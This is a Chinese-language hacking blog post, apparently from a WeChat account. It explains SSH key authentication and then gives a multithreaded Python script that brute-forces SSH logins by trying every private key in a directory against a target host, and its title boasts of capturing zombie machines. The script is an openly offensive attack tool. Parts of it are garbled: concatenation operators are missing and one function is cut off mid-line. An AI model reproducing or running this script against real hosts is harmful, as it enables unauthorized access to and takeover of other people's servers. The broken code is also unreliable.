ssh弱口令?弱秘钥?python?我仿佛抓到一大波肉鸡
清晨就是奋斗的开始,夜晚是英雄的落幕。
密钥登录的原理是:利用密钥生成器制作一对密钥:公钥和私钥。将公钥添加到服务器的某个账户上,然后在客户端利用私钥即可完成认证并登录。如果没有私钥,即使通过SSH 暴力破解出密码也无法远程登录系统。此外,如果将公钥复制到其他账户甚至主机,利用私钥也可以登录。
第一步产生秘钥:
将公钥复制在服务器上边通过scp命令
这样子传上去文件会在/home/username这个目录下,我们需要复制他到.ssh目录下,并且进行重新命名为authorized_keys最后就可以连接了
秘钥验证无口令破解:
import pexpect
import os
import optparse
import threading
maxConnections=5
connection_lock=threading.BoundedSemaphore(value=maxConnections)#设置一个信号量
STOP=False
Fails=0
def connect(username,host,keyfile,release):#进行连接测试的函数
global STOP#如果找到的话就停止
global Fails#测试被目标服务器拒绝的次数,如果次数多的话就结束程序
try:
perm_denied='Permission denied'
ssh_newkey='Are you sure you want to continue'
conn_closed='Connection closed by remote host'
opt=' -o PasswordAuthentication=no'
connStr='ssh ' username '@' host ' -i ' keyfile
child=pexpect.spawn(connStr)
ret=child.expect([pexpect.TIMEOUT,perm_denied,ssh_newkey,conn_closed,'#','
[code]def main():
parser=optparse.OptionParser('usage:%prog -H tgtHost -u username -k keyfiledir')
parser.add_option('-H',dest='tgtHost',type='string',help='specify the host')
parser.add_option('-u',dest='username',type='string',help='specify the username')
parser.add_option('-k',dest='keydir',type='string',help='specify the keydir')
(options,args)=parser.parse_args()#分离参数
tgtHost=options.tgtHost
username=options.username
keydir=options.keydir
if username==None or tgtHost==None or keydir==None:
print parser.usage
exit(0)
for filename in os.listdir(keydir):#群举文件,os.listdir会列出文件中的所有文件名
if STOP:
print 'keyfind !'
exit(0)
if Fails>5:
print 'remoted computer mybe have ips'
exit(0)
connection_lock.acquire()#申请信号量,保证同时开启的线程不会太多
#fullname=keydir '/' filename
fullname=os.path.join(keydir,filename)
print 'Testing file' fullname
t=threading.Thread(target=connect,args=(username,tgtHost,fullname,True))
t.start()
if __name__=='__main__':
main()
测试结果如下:
亲喜欢吗?记得点赞 | 留言 | 分享
长按公众号,可“ 置顶 ”
----------------------------------
要闻,干货,原创,专业
关注“黑白之道”微信:i77169
华夏黑客同盟我们坚持,自由,免费,共享!
